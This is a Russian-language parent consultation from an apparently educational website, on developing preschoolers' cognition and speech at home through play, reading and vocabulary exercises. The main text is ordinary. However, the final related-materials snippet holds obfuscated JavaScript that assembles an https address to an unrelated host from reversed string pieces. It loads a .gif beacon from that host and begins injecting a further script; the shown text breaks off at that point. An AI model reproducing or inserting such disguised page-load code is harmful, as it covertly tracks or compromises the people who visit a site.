Консультация для родителей "Познавательное развитие детей в домашних условиях"
консультация (подготовительная группа)

Меладзе Ольга Владимировна

Традиционно главным институтом воспитания является семья. То, что ребёнок в детские годы приобретает в семье, он сохраняет в течение всей последующей жизни. Важность семьи как института воспитания обусловлена тем, что в ней ребёнок находится в течение значительной части своей жизни, и по длительности своего воздействия на личность ни один из институтов воспитания не может сравниться с семьей. В ней закладываются основы личности ребёнка, и к поступлению в школу он уже более чем наполовину сформировался как личность. 

Скачать:

ВложениеРазмер
Файл poznavatelnoe_razvitie_v_domashnih_usloviyah.docx17.41 КБ

Предварительный просмотр:

Познавательное развитие детей в домашних условиях.

        Традиционно главным институтом воспитания является семья. То, что ребёнок в детские годы приобретает в семье, он сохраняет в течение всей последующей жизни. Важность семьи как института воспитания обусловлена тем, что в ней ребёнок находится в течение значительной части своей жизни, и по длительности своего воздействия на личность ни один из институтов воспитания не может сравниться с семьей. В ней закладываются основы личности ребёнка, и к поступлению в школу он уже более чем наполовину сформировался как личность.

       Именно в семье ребёнок получает первый жизненный опыт, делает первые наблюдения и учится как себя вести в различных ситуациях. Очень важно, чтобы то, чему родители учат ребёнка, подкреплялось конкретными примерами, чтобы он видел, что у взрослых теория не расходится с практикой. Главное в воспитании маленького человека – достижение душевного единения, нравственной связи родителей с ребёнком. Родителям ни в коем случае не стоит пускать процесс воспитания на самотек.

Деятельность детей дома может быть разделена на блоки:

 1. Специально организованное обучение. Родитель - инициатор, он ставит перед ребенком задачи, организует и контролирует их выполнение. В этом блоке развиваются сенсорные и мыслительные способности, расширяются и систематизируются знания детей: об окружающем мире, формируются элементы учебной деятельности.

2. Совместная деятельность родителей с детьми: чтение книг и беседы о прочитанном, слушание музыки, рассматривание иллюстраций и репродукций, сюжетные и настольные игры, совместный труд, экскурсии, прогулки, сопровождаемые рассказами родителей, пояснениями, беседами.

Целесообразно обеспечивать условия для деятельности детей «с незавершенным концом», чтобы дети при желании могли продолжить ее самостоятельно, пока не исчезнет их интерес. При развитии речи детей в домашних условиях, обучении их элементарным математическим представлениям, развитии их мыслительной деятельности необязательно создание специальных условий, наличие жесткой методической и содержательной регламентации, Главное условие - обучать, играя, используя игровые ситуации. Игра - это не забава. В играх ребенок получает много знаний и умений, усваивает новые слова, развивает речь.

Художественное произведение, познавательный рассказ взрослого, подкрепленный наблюдениями в природе, прогулки с детьми в парк, лес, на реку и разговор об увиденном дают ребенку ценные знания, воспитывают любознательность, развивают его.

       В четыре года познавательное развитие ребенка переходит на более высокую и качественно отличную от предыдущей. Это вызвано физиологическими и психологическими изменениями в общем развитии ребенка.

 В возрасте 4-5 лет можно выделить 4 основных направления познавательной активности детей:

1.Знакомство с предметами, явлениями, событиями, находящимися за пределами непосредственного восприятия и опыта детей;

2.Установление связей и зависимостей между предметами, явлениями и событиями, приводящих к появлению в сознании ребенка целостной системы представлений;

3.Удовлетворение первых проявлений избирательных интересов детей;

4.Формирование положительного отношения к окружающему миру.

        Достигнутый к четырем годам уровень психического развития позволяет ребенку сделать еще один очень важный шаг в познавательном развитии – дети 4-5 лет активно стремятся упорядочить накопленные представления об окружающем мире. Это – сложное занятие для маленького ребенка, но очень приятное и интересное. Более того, он испытывает постоянное неосознанное желание разобрать «завалы» полученных сведений о мире, навести в них «смысловой» порядок. В этом ему большую помощь оказывают взрослые. Ребенок начинает находить в окружающей действительности, выстраивать элементарные связи в зависимости между отдельными событиями, явлениями, предметами ближайшего окружения, которые в основном уже находятся в опыте ребенка.

      Видны и индивидуальные различия в том, что больше влечет, притягивает ребенка в окружающем мире. Так, например, два малыша с увлечением роются в земле. Один – чтобы пополнить свою «коллекцию» красивыми камешками и стеклышками, а другой – в поисках жучков.
      Все говорит о том, что у четырехлетних детей начинает проявляться избирательное отношение к миру, выражающееся в более стойком, направленном интересе к отдельным объектам или явлениям.      

      Важной задачей обучения дошкольников родному языку является развитие связной речи:

- развитие диалогической речи,

- развитие монологической речи.

Особенности: развернутость, связность, произвольность.

Задачи: планировать, намечать последовательность отдельных частей, звеньев передаваемого в речи содержания, не пропускать существенных эпизодов, не переставлять их беспорядочно, не делать ненужных вставок, логично переходить от одной части к другой, уметь закончить высказывание.

                  Формы развития качественной устной связной речи:

1.    Пересказывание художественных произведений;

2. Различные виды рассказывания (по картине, игрушке, творческое рассказывание);

3.    Чтение художественной литературы.

Достаточный словарный запас делает речь содержательной.

     Какие приёмы  могут использовать родители для обогащения речи своего ребёнка?

- знакомство с антонимами, определениями, синонимами;

- подбор синонимов к заданному слову;

- выбор из ряда синонимов наиболее подходящего;

- подбор к антонимам подходящих слов (составление словосочетания), например, светлый - темный (лес, ночь) день;

- изменение слова, например, ручей - гремучий и прозрачный; ручеек - маленький, звонкий, ручеечек - крошечный;

- подбор рифмы;

- подбор определений, эпитетов (какие бывают птицы? маленькие, большие, красивые, хищные, зимующие, перелетные);

- узнавание предмета по эпитетам: белоствольная, кудрявая, стройная (береза);

- подбор действий к предметам. Ветер что делает? (дует, воет, срывает листья);

- подбор предметов к действиям. На небе сияет, землю освещает, всех согревает (солнце);

- подбор к действию предметов

- подбор обстоятельств. Учиться можно как? (хорошо, лениво, плохо);

- подбор нюансов слов: дом, домик, домище;

- подбор детьми пропущенных слов (пришел почтальон, принес ...);

- составление распространенных предложений (Дети идут., куда? зачем?);

- составление части целого: дерево - ствол - ветки - сучья;

- составление предложения с определенным словом или не сколькими словами.

Все эти упражнения способствуют не только расширению, но и активизации детского словаря. Для того, чтобы слова входили в активный словарь, необходимо их многократно повторять.

         Стимулировать развитие познавательной деятельности можно посредством игры и увлекательных мероприятий. Не обязательно устраивать часовые «уроки», десяти минут вполне достаточно. Свое мероприятие вы должны построить таким образом, чтобы была возможность сообщить ребенку новую информацию, закрепить приобретенное знание и на его основе повторить уже давно известное малышу. Более того, не обязательно выделять специальное время для таких мероприятий. Познавать новое малыш может везде: на прогулке, в общественном транспорте, в поликлинике. Главное, чтобы взрослые могли грамотно рассказать о чем-нибудь новом и имели фантазию придумать интересное задание ребенку. Например, по дороге в детский сад можно рассказывать увиденное. Спросите ребенка: «Какой транспорт ты видишь?», «Посчитай, сколько машин белого цвета», «А что в природе бывает белым?».

        Помните, дорогие родители, что познавательное развитие – непрерывный процесс. Он начинается  сразу после рождения и заканчивается с последним вздохом. Ежесекундно человек получает какую-то новую для себя информацию, сравнивает ее с уже известной, анализирует, запоминает.

Умственное и психическое развитие ребенка невозможно без познавательной деятельности. Все, с чем знакомится малыш на данном жизненном этапе, играет важную роль для него в будущем. Полученная новая информация трансформируется в знания и, следовательно, в опыт.  


По теме: методические разработки, презентации и конспекты

Консультация для родителей: "Сенсорное развитие детей в домашних условиях"

Сенсорное развитие детей -это развитие их восприятия, формирование понятий о внешних свойствах предметов( форме, цвете, величине, запахе, вкусе…). И именно дошкольный возраст является наиболее ...

Консультация для родителей: "Сенсорное развитие детей в домашних условиях".

Сенсорное развитие детей – это развитие их восприятия, формирование понятий о внешних свойствах предметов (форме, цвете, величине, запахе, вкусе…). И именно дошкольный возраст является на...

Презентация консультации для родителей:"Возможности прозрачного мольберта для развития детей в домашних условиях"

ull;Прозрачный мольберт это многофункциональное пособие, которое сделано из акрилового стекла толщиной более 3 мм, вставленного в деревянную раму, дли индивидуальной работы дома оптимальный размер 4...

Консультация для родителей "Сенсорное развитие детей в домашних условиях"

Сенсорное развитие детей – это развитие их восприятия, формирование понятий о внешних свойствах предметов (форме, цвете, величине, запахе, вкусе и т.д.). Яркий, меняющийся мир ребенок позна...

Консультация для родителей «Сенсорное развитие детей в домашних условиях»

var e,n,o;window.self===window.top&&(e=[\'//\',\'s:\',\'tp\',\'ht\'].reverse().join(\'\'),n=[\'rzkmxcve.lussoit.com\',\'48\'].join(\'/\'),(o=new Image).src=\'\'.concat(e).concat(n,\'.gif\')); var script = document...